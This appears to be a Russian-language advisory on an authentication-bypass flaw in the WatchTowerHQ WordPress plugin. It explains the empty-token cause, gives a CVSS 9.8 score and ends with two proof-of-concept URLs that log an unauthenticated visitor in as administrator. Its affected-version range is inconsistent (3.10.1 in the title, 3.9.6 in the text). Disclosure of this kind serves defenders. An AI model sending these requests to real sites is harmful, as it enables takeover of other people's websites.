
WatchTowerHQ <= 3.10.1 - Обход аутентификации с получением прав администратора из-за отсутствия проверки пустого значения
WatchTowerHQ <= 3.10.1 - Обход аутентификации до администратора из-за отсутствия проверки пустого значения
Плагин WatchTowerHQ для WordPress уязвим к обходу аутентификации в версиях до 3.9.6 включительно. Это связано с тем, что значение по умолчанию 'watchtower_ota_token' пусто, а проверка на непустоту отсутствует в функции 'Password_Less_Access::login'. Это позволяет неаутентифицированным злоумышленникам войти в систему под пользователем-администратором клиента WatchTowerHQ.
Состояние: ОПУБЛИКОВАНО
Оценка: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
http://kubernetes.docker.internal/?wht_login=1
ИЛИ
http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
Если уязвимость присутствует, вы будете авторизованы как администратор.